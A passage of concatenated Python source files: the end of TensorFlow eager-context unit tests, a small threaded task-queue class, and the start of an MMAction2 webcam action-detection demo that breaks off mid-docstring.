# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
@test_util.run_gpu_only
def testInt32GPU(self):
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(),
ctx.scope_name,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
@test_util.run_gpu_only
@test_util.disable_tfrt('Context config not supported in TFRT.')
def testContextConfig(self):
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEqual(0, ctx.num_gpus())
def testPickle(self):
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, 't.pickle')
with open(fname, 'wb') as f:
t = constant_op.constant(10.0)
pickle.dump(t, f)
with open(fname, 'rb') as f:
t = pickle.load(f)
self.assertAllEqual(t.numpy(), 10.0)
@test_util.run_gpu_only
def testDevicePlacementEnforcesConsistency(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
cpu.__enter__()
self.assertEndsWith(current_device(), 'CPU:0')
gpu.__enter__()
self.assertEndsWith(current_device(), 'GPU:0')
with self.assertRaisesRegex(
RuntimeError, 'Exiting device scope without proper scope nesting'):
cpu.__exit__()
self.assertEndsWith(current_device(), 'GPU:0')
gpu.__exit__()
self.assertEndsWith(current_device(), 'CPU:0')
cpu.__exit__()
@test_util.run_gpu_only
def testReEntrant(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
with cpu:
with gpu:
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'CPU:0')
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
@test_util.run_gpu_only
def testTensorPlacement(self):
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
@test_util.run_gpu_only
def testResourceTensorPlacement(self):
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Check that even though we specified the cpu device we'll run the read op
# in the device where the handle is.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
@test_util.run_gpu_only
def testCopyBetweenDevices(self):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
@test_util.run_gpu_only
def testCopyBetweenDevicesAsync(self):
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.context().executor.wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.context().executor.wait()
context.context().executor.clear_error()
@test_util.run_gpu_only
def testCopyScope(self):
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
@test_util.disable_tfrt('ContextFromInterface not implemented.')
def testPyFunctionNullContext(self):
def simple_fn(unused_handle):
return 1.
with ops.device('CPU:0'):
test_var = variables.Variable([2., 3.])
@def_function.function
def test_fn(v):
script_ops.eager_py_func(simple_fn, [v.handle], dtypes.float32)
return 1.
self.assertAllEqual(test_fn(test_var), 1.0)
@test_util.disable_tfrt('PyFunc is not supported in TFRT.')
def testPyFunctionAsync(self):
self.skipTest('flaky; b/194307407')
def simple_fn(v):
one = constant_op.constant(1.)
return v + one
@def_function.function
def test_fn(v):
return script_ops.eager_py_func(simple_fn, [v], dtypes.float32)
async_executor = executor.new_executor(enable_async=True)
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
self.assertAllEqual(test_fn(test_var), 3.0)
async_executor.wait()
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
result = test_fn(test_var)
context.async_wait()
self.assertAllEqual(result, 3.0)
@test_util.run_gpu_only
def testNumpyForceCPU(self):
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tfe.TFE_Py_RegisterExceptionClass(str)
pywrap_tfe.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
# TODO(b/149995282): When an exception is thrown in ASYNC mode, it seems
# there are things left over that cause mutex corruption when
# _reset_context() is called before the next test is executed.
#
# context.set_execution_mode(context.ASYNC)
# with self.assertRaises(errors.InvalidArgumentError):
# execute(
# b'MatMul',
# num_outputs=1,
# inputs=[three, five],
# attrs=('transpose_a', False, 'transpose_b', False, 'T',
# three.dtype.as_datatype_enum))
# context.context().executor.wait()
#
context.context().executor.clear_error()
context.context().execution_mode = context.SYNC
@test_util.disable_tfrt('TFRT asserts correct number of outputs instead of '
'returning error status.')
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
@test_util.disable_tfrt('TFRT asserts correct number of outputs instead of '
'returning error status.')
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
@test_util.run_gpu_only
def testMatMulGPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
@test_util.run_gpu_only
def testMatMulGPUCopyToCPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
with ops.device('CPU:0'):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3.]]),
constant_op.constant([[5.]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaisesRegex(
errors.InvalidArgumentError,
'Expecting a Dimension for attr shape, got object'):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [object()], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
@test_util.disable_eager_op_as_function('b/206994108')
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
@test_util.disable_tfrt('TFRT raises InternalError instead of NotFoundError')
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEqual(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
@test_util.run_gpu_only
def testOperationWithNoInputsRunsOnDevice(self):
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
self.assertEqual(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
def testConvertMixedEagerTensorsWithVariables(self):
var = resource_variable_ops.ResourceVariable(1.0)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
['foo', var], context.context())
self.assertAllEqual([dtypes.string, dtypes.float32], types)
for t in tensors:
self.assertIsInstance(t, ops.EagerTensor)
# TODO(b/123637108): re-enable
@test_util.run_gpu_only
def disabled_testSmallIntegerOpsForcedToCPU(self):
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.int64)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op forced to CPU since all constants are integers and small.
self.assertEndsWith(c.device, 'CPU:0')
a = array_ops.zeros((8, 10), dtype=dtypes.int64)
b = array_ops.ones((8, 10), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the tensors are larger than 64 elements.
self.assertEndsWith(c.device, 'GPU:0')
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.float32)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.float32)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the constants are not integers.
self.assertEndsWith(c.device, 'GPU:0')
def testExecutionModeIsStoredThreadLocal(self):
cv = threading.Condition()
count = [0]
num_threads = 10
def execution_mode_test(cond, count, num_threads, ctx, mode):
cond.acquire()
# Ensure that all threads set their mode simultaneously
# Note that this is not a simple assignment, as the execution_mode is an
# @property with a custom setter.
ctx.execution_mode = mode
count[0] = count[0] + 1
if count[0] < num_threads:
cond.wait()
else:
cond.notify_all()
cond.release()
self.assertEqual(ctx.execution_mode, mode)
ctx = context.Context()
threads = []
for i in range(num_threads):
t = threading.Thread(
target=execution_mode_test,
args=(cv, count, num_threads, ctx,
context.SYNC if i % 2 == 0 else context.ASYNC))
t.start()
threads.append(t)
for t in threads:
t.join()
def testEmptyResourceReturned(self):
with ops.device('CPU:0'):
v = variables.Variable(1.)
empty_handle = array_ops.gather(
v.handle[array_ops.newaxis], array_ops.zeros([0], dtype=dtypes.int32))
self.assertEqual(
[0],
empty_handle.shape.as_list())
@test_util.with_eager_op_as_function
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def setUp(self):
super(SendRecvTest, self).setUp()
context._reset_context()
configure_virtual_cpus()
@test_util.disable_tfrt('Send/Receive not supported in TFRT yet.')
def testBasic(self):
with ops.device(self.cpu_device):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
@test_util.run_gpu_only
@test_util.disable_tfrt('Send/Receive not supported in TFRT yet.')
def testLocalCrossDevice(self):
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = array_ops.identity(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
class EagerTensorCacheTest(test_util.TensorFlowTestCase):
def setUp(self):
super(EagerTensorCacheTest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def testCacheSkipsTensorsTooLarge(self):
cache = context._EagerTensorCache(max_items=100, max_tensor_size=3)
cache.put('1', array_ops.zeros((2, 2)))
self.assertIsNone(cache.get('1'))
cache.put('2', array_ops.zeros((2)))
self.assertIsNotNone(cache.get('2'))
if __name__ == '__main__':
test.main()
|
tkew.py | from threading import Thread
from multiprocessing import cpu_count
from typing import List, Tuple, Optional
DEFAULT_WORKER_SIZE = cpu_count() // 2
class TaskQueue:
def __init__(self, num_workers: int = DEFAULT_WORKER_SIZE):
self.__workers: List[Thread] = [Thread(target=self.__listen, args=(wid,) ) for wid in range(num_workers)]
self.__delegator: Thread = Thread(target=self.__delegate)
self.__q: List[Tuple] = []
self.__jobs: List[Optional[Tuple]] = [None] * num_workers
self.__signal: bool = False
def __listen(self, wid):
while not self.__signal:
job = self.__jobs[wid]
if job != None:
fn, ags, kwa = job
fn(*ags, **kwa)
self.__jobs[wid] = None
def __poll(self) -> int:
i = 0
n = len(self.__workers)
while self.__jobs[i % n] != None:
i += 1
return i % n
def __delegate(self):
while not self.__signal:
if len(self.__q) != 0:
wid = self.__poll()
self.__jobs[wid] = self.__q[0]
self.__q.pop(0)
def start(self):
self.__delegator.start()
for worker in self.__workers:
worker.start()
def stop(self):
while (any(self.__jobs)) or (len(self.__q) != 0):
pass
self.__signal = True
self.__delegator.join()
for worker in self.__workers:
worker.join()
def queue(self, fn, *args, **kwargs):
self.__q.append((fn, args, kwargs)) |
webcam_demo_via3.py | import argparse
import time
from collections import deque
from operator import itemgetter
from threading import Thread
import mmcv
import cv2
import numpy as np
import torch
from mmcv.parallel import collate, scatter
from mmcv.runner import load_checkpoint
from mmaction.datasets.registry import DATASETS
from mmcv.utils import build_from_cfg
from mmaction.apis import init_recognizer
from mmaction.datasets.pipelines import Compose
from mmaction.utils import import_module_error_func
from mmaction.models import build_detector
import random
import seaborn as sns
from mmaction.datasets.via3_dataset import VIA3Dataset
try:
from mmdet.apis import inference_detector, init_detector, show_result_pyplot
except (ImportError, ModuleNotFoundError):
@import_module_error_func('mmdet')
def inference_detector(*args, **kwargs):
pass
@import_module_error_func('mmdet')
def init_detector(*args, **kwargs):
pass
FONTFACE = cv2.FONT_HERSHEY_COMPLEX_SMALL
FONTSCALE = 1
FONTCOLOR = (255, 255, 255) # BGR, white
MSGCOLOR = (128, 128, 128) # BGR, gray
THICKNESS = 1
LINETYPE = 1
EXCLUED_STEPS = [
'OpenCVInit', 'OpenCVDecode', 'DecordInit', 'DecordDecode', 'PyAVInit',
'PyAVDecode', 'RawFrameDecode', 'FrameSelector'
]
def parse_args():
parser = argparse.ArgumentParser(description='MMAction2 webcam demo')
parser.add_argument(
'--config',
default=('configs/detection/ava/'
'slowfast_kinetics_pretrained_r50_8x8x1_20e_ava_rgb.py'),
help='spatio temporal detection config file path')
parser.add_argument(
'--checkpoint',
default=('../../Checkpoints/mmdetection/faster_rcnn_r50_fpn_2x_coco_bbox_mAP-0.384_20200504_210434-a5d8aa15'),
help='spatio temporal detection checkpoint file/url')
parser.add_argument(
'--det-config',
default='../../Checkpoints/mmdetection/my_gfl_r50_fpn_mstrain_2x_person_gn.py',
help='human detection config file path (from mmdet)')
parser.add_argument(
'--det-checkpoint',
default=('../../Checkpoints/mmdetection/my_gfl_r50_fpn_mstrain_2x_person_gn.pth'),
help='human detection checkpoint file/url')
parser.add_argument(
'--device', type=str, default='cuda:0', help='CPU/CUDA device option')
parser.add_argument(
'--camera-id', default=0, help='camera device id')
parser.add_argument(
'--img-scale', type=float, default=0.25, help='out img reszie scale')
parser.add_argument(
'--det-score-thr',
type=float,
default=0.5,
help='the threshold of human detection score')
parser.add_argument(
'--act-score-thr',
type=float,
default=0.5,
help='the threshold of human action score')
parser.add_argument(
'--drawing-stepsize',
type=int,
default=3,
help='drawing give out a drawing per n frames')
args = parser.parse_args()
assert args.drawing_stepsize >= 0 , \
'upper bound FPS value of drawing and inference should be set as ' \
'positive number, or zero for no limit'
return args
def load_label_map(data_cfg):
data_test_cfg = data_cfg.test
dataset_cfg=None
if data_test_cfg.type=='ConcatDataset':
dataset_cfg = data_test_cfg.datasets[0]
elif data_test_cfg.type=='VIA3Dataset':
dataset_cfg = data_test_cfg
else:
print('็ฎๅๅชๆฏๆ ConcatDataset ๆ่
VIA3Dataset')
via3 = build_from_cfg(dataset_cfg, DATASETS)
return via3.opt_labels2opt_names
class DetModel:
def __init__(self, config, checkpoint, score_thr=0.5, device='cuda:0'):
self.score_thr = score_thr
self.device = device
self.model = init_detector(config, checkpoint ,self.device)
assert self.model.CLASSES[0] == 'person', ('We require you to use a detector '
'trained on COCO')
def __call__(self, imgs):
result = inference_detector(self.model , imgs)
bboxes, labels = restore_result(result)
thr_ind = bboxes[:,4]>=self.score_thr
bboxes, labels = bboxes[thr_ind], labels[thr_ind]
class_ind = labels==0
bboxes, labels = bboxes[class_ind], labels[class_ind]
return bboxes, labels
class ActModel():
def __init__(self, config_path, checkpoint, score_thr=0.5, label_dict=None, device='cuda:0'):
self.score_thr = score_thr
self.label_dict =label_dict
self.device = device
config = mmcv.Config.fromfile(config_path)
self.img_norm_cfg = config['img_norm_cfg']
if 'to_rgb' not in self.img_norm_cfg and 'to_bgr' in self.img_norm_cfg:
to_bgr = self.img_norm_cfg.pop('to_bgr')
self.img_norm_cfg['to_rgb'] = to_bgr
self.img_norm_cfg['mean'] = np.array(self.img_norm_cfg['mean'])
self.img_norm_cfg['std'] = np.array(self.img_norm_cfg['std'])
# Get clip_len, frame_interval and calculate center index of each clip
val_pipeline = config['val_pipeline']
sampler = [x for x in val_pipeline if x['type'] == 'SampleVia3Frames'][0]
self.clip_len, self.frame_interval = sampler['clip_len'], sampler['frame_interval']
self.window_size = self.clip_len * self.frame_interval
assert self.clip_len % 2 == 0, 'We would like to have an even clip_len'
config.model.backbone.pretrained = None
self.model = build_detector(config.model, test_cfg=config.get('test_cfg'))
load_checkpoint(self.model, checkpoint, map_location=self.device)
self.model.to(self.device)
self.model.eval()
def post_proce(self, result, proposal):
result = result[0]
act_pred = []
# N proposals
for i in range(proposal.shape[0]):
act_pred.append([])
# Perform action score thr
for i in range(len(result)):
if (i not in self.label_dict) or (i==0):
continue
for j in range(proposal.shape[0]):
if result[i][j, 4] > self.score_thr:
act_pred[j].append((self.label_dict[i], result[i][j, 4]))
return act_pred
def __call__(self, frames, proposals):
frame_w, frame_h = frames[0].shape[1], frames[0].shape[0]
new_w, new_h = mmcv.rescale_size((frame_w, frame_h), (256, np.Inf))
w_ratio, h_ratio = new_w / frame_w, new_h / frame_h
frames = [mmcv.imresize(img, (new_w, new_h)) for img in frames]
_ = [mmcv.imnormalize_(frame, **self.img_norm_cfg) for frame in frames]
# THWC -> CTHW -> 1CTHW
input_array = np.stack(frames).transpose((3, 0, 1, 2))[np.newaxis]
input_tensor = torch.from_numpy(input_array).to(self.device)
proposal = proposals[len(proposals) // 2]
proposal = torch.from_numpy(proposal[:, :4]).to(self.device)
if proposal.shape[0] == 0:
return None
proposal[:, 0:4:2] *= w_ratio
proposal[:, 1:4:2] *= h_ratio
with torch.no_grad():
result = self.model(
return_loss=False,
img=[input_tensor],
img_metas=[[dict(img_shape=(new_h, new_w))]],
proposals=[[proposal]])
return self.post_proce(result, proposal)
def random_color(seed):
"""Random a color according to the input seed."""
random.seed(seed)
colors = sns.color_palette()
color = random.choice(colors)
return color
def visualize_bbox_act(img, bboxes,labels, act_preds,
classes=None,thickness=1,
font_scale=0.4,show=False,
wait_time=0,out_file=None):
"""Show the tracks with opencv."""
assert bboxes.ndim == 2
assert labels.ndim == 1
assert bboxes.shape[0] == labels.shape[0]
assert bboxes.shape[1] == 5
if isinstance(img, str):
img = mmcv.imread(img)
img_shape = img.shape
bboxes[:, 0::2] = np.clip(bboxes[:, 0::2], 0, img_shape[1])
bboxes[:, 1::2] = np.clip(bboxes[:, 1::2], 0, img_shape[0])
text_width, text_height = 8, 15
for i, (bbox, label) in enumerate(zip(bboxes, labels), 0):
x1, y1, x2, y2 = bbox[:4].astype(np.int32)
score = float(bbox[-1])
# bbox
bbox_color = random_color(label)
bbox_color = [int(255 * _c) for _c in bbox_color][::-1]
cv2.rectangle(img, (x1, y1), (x2, y2), bbox_color, thickness=thickness)
# score
text = '{:.02f}'.format(score)
width = len(text) * text_width
img[y1 - text_height:y1, x1:x1 + width, :] = bbox_color
cv2.putText(
img,
text, (x1, y1 - 2),
cv2.FONT_HERSHEY_COMPLEX,
font_scale,
color=(0, 0, 0))
classes_color = random_color(label + 1)
text = classes[label]
width = len(text) * text_width
img[y1:y1 + text_height, x1:x1 + width, :] = bbox_color
cv2.putText(img,text,
(x1, y1 + text_height - 2),
cv2.FONT_HERSHEY_COMPLEX,
font_scale,color=classes_color)
#background_color = random_color(label + 5)
background_color = [255, 204, 153]
if (act_preds is not None) and (len(bboxes)==len(labels)==len(act_preds)):
for j, act_pred in enumerate(act_preds[i]):
text = '{}: {:.02f}'.format(act_pred[0], act_pred[1])
width = len(text) * (text_width)
img[y1+text_height*(j+2) :y1 + text_height*(j+3), x1:x1 + width, :] = background_color
cv2.putText(img, text,
(x1, y1 + text_height*(j+3) - 2),
cv2.FONT_HERSHEY_COMPLEX,
font_scale, color=classes_color)
if show:
mmcv.imshow(img, wait_time=wait_time)
if out_file is not None:
mmcv.imwrite(img, out_file)
return img
def restore_result(result, return_ids=False):
"""Restore the results (list of results of each category) into the results
of the model forward.
Args:
result (list[ndarray]): shape (n, 5) or (n, 6)
return_ids (bool, optional): Whether the input has tracking
result. Default to False.
Returns:
tuple: tracking results of each class.
